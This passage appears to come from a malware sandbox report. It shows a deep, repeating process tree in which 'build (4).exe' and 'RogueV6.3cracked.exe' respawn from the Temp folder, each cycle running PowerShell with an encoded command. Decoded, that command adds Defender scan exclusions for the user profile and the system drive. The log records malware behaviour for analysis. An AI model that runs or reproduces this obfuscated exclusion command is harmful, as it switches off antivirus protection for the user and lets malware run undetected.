        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        221⤵
        
        PID:6580
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        221⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        222⤵
        
        PID:8304
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        222⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        222⤵
        
        PID:9088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        223⤵
        
        PID:8252
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        223⤵
        
        PID:8496
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        223⤵
        
        PID:9980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        224⤵
        
        PID:9884
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        224⤵
        
        PID:9796
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        224⤵
        
        PID:9864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        225⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        225⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        225⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        226⤵
        
        PID:1212
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        226⤵
        
        PID:8224
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        226⤵
        
        PID:9568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        227⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        227⤵
        
        PID:5304
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        227⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        228⤵
        
        PID:8588
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        228⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        228⤵
        
        PID:9568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        229⤵
        
        PID:10284
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        229⤵
        
        PID:10292
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        229⤵
        
        PID:10332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        230⤵
        
        PID:10540
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        230⤵
        
        PID:10548
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        230⤵
        
        PID:10588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        231⤵
        
        PID:10760
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        231⤵
        
        PID:10772
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        231⤵
        
        PID:10784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        232⤵
        
        PID:10956
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        232⤵
        
        PID:10972
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        232⤵
        
        PID:10984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        233⤵
        
        PID:11228
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        233⤵
        
        PID:11236
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        233⤵
        
        PID:10260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        234⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        234⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        234⤵
        
        PID:8016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        235⤵
        
        PID:9452
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        235⤵
        
        PID:10436
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        235⤵
        
        PID:10460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        236⤵
        
        PID:6356
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        236⤵
        
        PID:8080
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        236⤵
        
        PID:6504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        237⤵
        
        PID:11224
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        237⤵
        
        PID:11216
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        237⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        238⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        238⤵
        
        PID:8344
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        238⤵
        
        PID:8444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        239⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        239⤵
        
        PID:8384
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        239⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        240⤵
        
        PID:8528
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        240⤵
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        240⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        241⤵
        
        PID:11192
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        241⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        241⤵
        
        PID:7820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        242⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        242⤵
        
        PID:7400
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        242⤵
        
        PID:7296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        243⤵
        
        PID:10988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        244⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        243⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        243⤵
        
        PID:9164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        244⤵
        
        PID:9020
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        244⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        244⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        245⤵
        
        PID:5600
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        245⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        245⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        246⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        246⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        246⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        247⤵
        
        PID:7820
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        247⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        247⤵
        
        PID:8404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        248⤵
        
        PID:8944
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        248⤵
        
        PID:10980
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        248⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
